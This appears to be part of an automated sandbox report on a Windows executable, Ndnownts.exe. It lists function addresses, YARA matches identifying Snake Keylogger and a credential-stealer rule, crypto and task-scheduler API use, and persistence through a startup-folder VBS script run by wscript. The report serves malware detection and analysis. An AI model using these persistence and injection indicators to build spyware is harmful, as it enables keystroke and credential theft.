                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_055688810_2_05568881
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_055688AA0_2_055688AA
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_06C9F1600_2_06C9F160
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_06C800400_2_06C80040
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_06C800060_2_06C80006
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_06C9E5680_2_06C9E568
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_015761201_2_01576120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157F0171_2_0157F017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157B3381_2_0157B338
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157C4571_2_0157C457
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157C7611_2_0157C761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157B7E21_2_0157B7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_015746D91_2_015746D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_015798681_2_01579868
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_015768981_2_01576898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157CA411_2_0157CA41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157BAC01_2_0157BAC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157BDA01_2_0157BDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_015735701_2_01573570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157B5021_2_0157B502
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157E5381_2_0157E538
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157E5271_2_0157E527
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0157C4801_2_0157C480
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_0140D3884_2_0140D388
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_014092E04_2_014092E0
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_014092F04_2_014092F0
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_014099814_2_01409981
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074BF1604_2_074BF160
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074BE5684_2_074BE568
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074A00404_2_074A0040
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074A00374_2_074A0037
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022AB3287_2_022AB328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022AF0077_2_022AF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022A61087_2_022A6108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022AC1907_2_022AC190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022A67307_2_022A6730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022AC7517_2_022AC751
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022AC4707_2_022AC470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022A95407_2_022A9540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022ACA317_2_022ACA31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022A4AD97_2_022A4AD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022ABBD27_2_022ABBD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022ABEB07_2_022ABEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022A043A7_2_022A043A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022AB4F27_2_022AB4F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022AE5287_2_022AE528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022AE5177_2_022AE517
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_022A35707_2_022A3570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B184607_2_04B18460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B138707_2_04B13870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B100407_2_04B10040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B111C07_2_04B111C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B17B707_2_04B17B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1E4B07_2_04B1E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B104A07_2_04B104A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1E4A07_2_04B1E4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B104907_2_04B10490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1B4E87_2_04B1B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1B4D77_2_04B1B4D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1DC007_2_04B1DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B17D907_2_04B17D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1BD987_2_04B1BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1BD887_2_04B1BD88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B10D607_2_04B10D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1ED607_2_04B1ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B10D517_2_04B10D51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1ED507_2_04B1ED50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1CEF87_2_04B1CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1CEEA7_2_04B1CEEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1C6387_2_04B1C638
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1F6107_2_04B1F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1F6007_2_04B1F600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1C6487_2_04B1C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1D7A87_2_04B1D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1D7987_2_04B1D798
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B108F07_2_04B108F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1E8F87_2_04B1E8F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B100067_2_04B10006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B138607_2_04B13860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1E0587_2_04B1E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1E0497_2_04B1E049
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B111B07_2_04B111B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1F1B87_2_04B1F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1F1A97_2_04B1F1A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1C1F07_2_04B1C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1C1E07_2_04B1C1E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1B9307_2_04B1B930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B109007_2_04B10900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1E9087_2_04B1E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1B9407_2_04B1B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1CAA07_2_04B1CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1CA907_2_04B1CA90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1FA687_2_04B1FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1FA597_2_04B1FA59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1DBF17_2_04B1DBF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B173E87_2_04B173E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B173D87_2_04B173D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1D3507_2_04B1D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B1D3407_2_04B1D340
                Source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1740588716.000000000082E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1757446577.0000000005F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBzchka.dll" vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1741258818.00000000025CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1750536952.00000000037DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1750536952.00000000037DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBzchka.dll" vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1741258818.000000000294A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1752636794.0000000005500000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBzchka.dll" vs Ndnownts.exe
                Source: Ndnownts.exe, 00000000.00000002.1750536952.0000000003762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ndnownts.exe
                Source: Ndnownts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Ndnownts.exe.3589550.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, tilDvqDFLNhXNLqYPJa.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, tilDvqDFLNhXNLqYPJa.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, tilDvqDFLNhXNLqYPJa.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, tilDvqDFLNhXNLqYPJa.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.Ndnownts.exe.3589550.4.raw.unpack, .csBase64 encoded string: 'KpBbI7ZFx/HL+x4LWR4nVaQadNHudnacfHDTX+3hZRA6PmA5WPllT//oQCet0nwM'
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
                Source: C:\Users\user\Desktop\Ndnownts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs"
                Source: Ndnownts.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Ndnownts.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
